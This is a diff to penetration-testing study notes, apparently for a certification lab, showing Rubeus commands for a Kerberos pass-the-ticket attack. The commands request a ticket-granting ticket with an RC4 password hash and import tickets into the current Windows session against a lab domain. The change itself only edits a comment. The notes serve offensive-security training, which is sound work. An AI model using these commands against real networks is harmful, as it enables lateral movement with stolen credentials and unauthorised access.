0xmid00/infosec/generic-methodologies-and-resources/CPTS/8-Password Attacks/Windows Lateral Movement.md

 # Pass the Ticket (PtT)

 ## Rubeus Pass the Ticket
-Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt # submit the ticket (TGT or TGS) to the current logon session
+Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt # submit the ticket TGT to the current logon session
 Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi # import the ticket into the current session
 ### Pass the Ticket - Base64 Format
 ### we can perform a Pass the Ticket providing the base64 string instead of the file name.